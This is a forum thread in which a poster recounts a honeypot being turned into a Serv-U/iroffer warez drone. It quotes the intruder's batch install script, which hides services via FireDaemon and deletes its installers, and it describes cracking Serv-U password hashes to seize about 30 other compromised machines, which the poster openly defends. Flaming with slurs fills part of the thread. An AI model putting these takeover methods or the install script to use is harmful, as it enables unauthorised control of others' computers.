My honeypot got "r00ted" yesterday, and turned into a serv-u / iroffer drone.

The install kit used was quite interesting, it made a folder WINNT (my windows folder is \WINDOWS) on root, which was hidden from windows (had to dameware to it), and inside this was the following structure: C:\WINNT\microsoftdrivers\etc\.

This contained the usual stuff like firedaemon, serv-u, iroffer and some scripts to secure the box.

Anyway, interestingly, it did not make a my.config file for iroffer, so to trace it, i just used a packet sniffer.

I found the xdcc channel, which had another 30 or so bots inside.

I then started brute forcing the servudaemon.ini hashes (it set up full execute priv accoutn on root c).

Now for the funny bit. After resolving all the xdcc bot's ip addresses, it turns out they all use same autoroot install kit, and hence the same serv-u pwds.

Needless to say, overnight the room lost all its bots (i wont say where they live now).

The moral of this story, secure your pubstros properly, and dont use identical pwds on all (and avoid execute priv in servu).

y didn't u just set up a sniffer on ur comp and wait for the person to logon? You couldve gotten the pass that much easier

Ah man(theangel) dont take it that serious, a hitler avatar does not mean he is a nazi or whatsoever

TheAngel is right..

isn't the avatar half hitler half bush ?

Lol, sure. So can you explain us how did you bruteforce those MD5 Serv-U's hashes sooo fast? And how did you know ServU's MD5 salt format?

MAybe it was serv-u 2.5

HAHA! Stealing XDCC Bots from people! You thief! I better keep a lookout for you in future!

What packet sniffer did u use to setup on teir comp...

please note that it is half hitler half bush so don't worry

Wtf!? A hitler avatar means you are nazi? Way to be narrowminded. Maybe he dislikes the Bush government and is trying to show his dislike. Maybe he's trying to be funny (I had a chuckle at it). Lighten the (filtered) up people.

Btw, to get the MD5 hash format just search this forum, its been discussed (2 letter then MD5 hash).

heh, if im evil, what does that make the guy who fell for my honeypot (apart from stupid).

anyway, in case anyone here has been "rooted" (it annoys me this kiddie term being used for non rootkits), here's the install script and hence the services to kill:

@echo off
regedit /s fire.reg

SET MXHOME=c:\winnt\microsoftdrivers\etc\

SET MXBIN=c:\winnt\microsoftdrivers\etc\

FireDaemon -i ftp.xml
FireDaemon -i irof.xml
FireDaemon -i secure.xml
FireDaemon -i rserv.xml


net start indexing

net start wlogin

net start DNS

net start network

del c:\TEMP\install.bat
del c:\TEMP\help.exe
del c:\TEMP\hideapp.exe


@EXIT


i.e. simply stop indexing, wlogin, DNS and network to stop the pubstro installation.

(isn't it nice of the kiddies to leave me a uninstall guide).

The only bit of the 'kit' which surprised me, was the iroffer config has been patched to the .exe - i.e. no my.config file.

Anyways, my view is that there's nothing wrong with "stealing" other ppls bots, if they are too stupid to secure them.

: 0 thats cool

how would someone make their xdcc channel bot secure? i'm just curious

well, had they not given execute rights to serv-u, i wouldnt have been able to steal them.

yes u could - if the account was system admin, u couldve connected to the bots ftp via serv-u software and changed ur priv to +exec

btw - this is hitler 2! not hitler - its george MONKEY bush dressed up as hitler and demanding oil! i am not a nazi and have no contacs with germany

lol saetji dude are u the same from apna. are u the one who is king of apna
if u are then i have heard a lot abt u hmmm.. nothing bad all good that u are a good programer and stuffs u got it naa hehe

i am sorry saetji but if you are an american and proud of your country please get ride of that lame avatar, no matter if it's 2 fag halves. I am proud of my country the UNITED STATES OF AMERICA and you offend me by just having that icon.

You have the freedom i can't stop you but if you feel like rocking that avatar go to germany or some other country.


back on topic. That's nice you took his/her bots away now what are you going to do with them install ur own pack?

The rooter was using a very simple pack. When i was doing all of that stuff the only way u would be able to get any info on what was going on would be to use a sniffer like you did but it would of been hard for you to find all directories, pass the dummy 10 serv-u's, anal ftps, raidens, and get passed the ssl password protected irc server which binds to a real server once authenticated.

ahhh the fun i had.

I just feel bad i lost a 5000 botnet do to a dumb ass move in the dns assignments.
so nobody is perfect. this guy made the mistake of using a very simple rootpack.

btw: what exploit did he gain access threw

damn lol... just cause your american doesn't mean you have to be proud-or move to germany. keep your closed-minded comments to yourself and let him express his hate for bush as do i. he can't even eat a pretzel that damn retard *laughs*

back to topic:

what did you set up your honeypot as? or did you just leave your computer in the open.

serv-u uses an MD5 encryption for it's passwords stored in the ini file, it would had taken you somewhere around a few hundrend thousand years to brute force it using a typical pc. you didnt get the serv-u password, maybe the iroffer password, which only used DES encrpytion and can be cracked using very old school programs.

lmao, someone here doesnt know about dictionary attacks on hashes, and had i been less lucky, and met a strong password, I would have simply downloaded a set of rainbow tables and still have found the password in under a few hours.

The honey pot setup was VMWare, running XP without SP1 and using default admin password.

oh and can we PLEASE get back on the topic of security and stop this stupid flame war.

I find this remark implicitly racist: "feel like rocking that avatar go to germany ". He would not be welcome in Germany either, this comment implies Nazi's are currently supported in Germany which is total F*CK*NG S*IT ok.

good job tibbar, very funny

99% of the people on this website are complete morons, this place is a haven for bored kids that dont know shit about security, and looking for a ./ or .exe to do the work for them.

that's a pretty hash comment.

a lot of newbees have joined since the forum opened again, but there are many extremely experienced security experts here.

if you dont like it, go else where.

anybody can give me that honeyport i want to try steal xdcc bot.

hmmm he said what he wrote. do you read the entire thread before posting? also, search on google (if it is within your knowledge how to) on honeypots.

syiron he just wrote on page 2 that he was using VMWare, on xp without sp1.... www.google.com.